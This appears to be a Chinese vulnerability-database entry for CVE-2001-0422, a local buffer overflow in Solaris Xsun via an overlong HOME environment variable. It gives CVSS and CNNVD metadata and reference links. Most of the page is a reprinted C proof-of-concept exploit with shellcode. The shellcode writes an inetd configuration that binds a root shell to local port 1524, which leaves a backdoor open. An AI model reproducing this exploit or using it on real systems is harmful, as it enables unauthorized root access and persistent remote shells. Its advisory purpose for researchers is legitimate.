Solaris Xsun缓冲区溢出漏洞-安全小百科

Solaris Xsun缓冲区溢出漏洞

漏洞ID	1106288	漏洞类型	缓冲区溢出
发布时间	2001-04-10	更新时间	2005-05-02
CVE编号	CVE-2001-0422	CNNVD-ID	CNNVD-200107-007
漏洞平台	Solaris	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/20743
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-007

|漏洞详情

Solaris8及其早期版本的Xsun存在缓冲区溢出漏洞。本地用户借助超长HOME环境变量执行任意命令。

|漏洞EXP

source: http://www.securityfocus.com/bid/2561/info

The X11 server that ships with Sun Microsystems' Solaris, Xsun, contains a locally exploitable buffer overflow vulnerability.

The condition is present when the value of the HOME environment variable is of excessive length (more than 1050 bytes long).

An attacker may exploit this vulnerability to execute arbitrary code with effective group 'root' privileges. 

/***********************************/
Solaris 7 (x86) /usr/openwin/bin/Xsun
HOME environment overflow

Proof of Concept Exploitation
[email protected]

Puts a Root shell on local port 1524
/***********************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFLEN  1041

/* seteuid/setuid/inetd shell */
char eyecode[] =
"xebx51x9ax65x65x79x65x07x90xc3x5e"
"x29xc0x89x46xabx88x46xb0x89x46x0c"
"x50xb0x8dxe8xe4xffxffxffx29xc0x50"
"xb0x17xe8xdaxffxffxffx29xc0x88x46"
"x17x88x46x1ax88x46x78x29xc0x50x56"
"x8dx5ex10x89x1ex53x8dx5ex18x89x5e"
"x04x8dx5ex1bx89x5ex08xb0x3bxe8xb2"
"xffxffxffx90x90xc3xe8xb2xffxffxff"
"x90x6bx61x6dx90x90x90x90x90x90x90"
"x90x90x90x90x90x2fx62x69x6ex2fx73"
"x68x20x2dx63x20"
"echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/eeye;"
"/usr/sbin/inetd -s /tmp/eeye2001";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int get_esp()
{__asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
{
	int i;
	if (argc > 1)
		offset = strtol(argv[1], NULL, 0);
	else
		offset = -200;
	esp = get_esp();
	memset(buf, 0x90, BUFLEN);
	memcpy(buf+800, eyecode, strlen(eyecode));
	*((int *) &buf[1037]) = esp+offset;
	strncpy(&buf[0],"HOME=",5);
	putenv(buf);
	execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
	return;
}

|参考资料

来源:BID
名称:2561
链接:http://www.securityfocus.com/bid/2561
来源:BUGTRAQ
名称:20010410SolarisXsunbufferoverflowvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0158.html
来源:XF
名称:solaris-xsun-home-bo(6343)
链接:http://xforce.iss.net/static/6343.php
来源:USGovernmentResource:oval:org.mitre.oval:def:555
名称:oval:org.mitre.oval:def:555
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:555

相关推荐: Cisco Catalyst CatOS Authentication Bypass Vulnerability

Cisco Catalyst CatOS Authentication Bypass Vulnerability 漏洞ID 1100502 漏洞类型 Design Error 发布时间 2003-04-24 更新时间 2003-04-24 CVE编号 N/A …

文章版权归作者所有，未经允许请勿转载。

THE END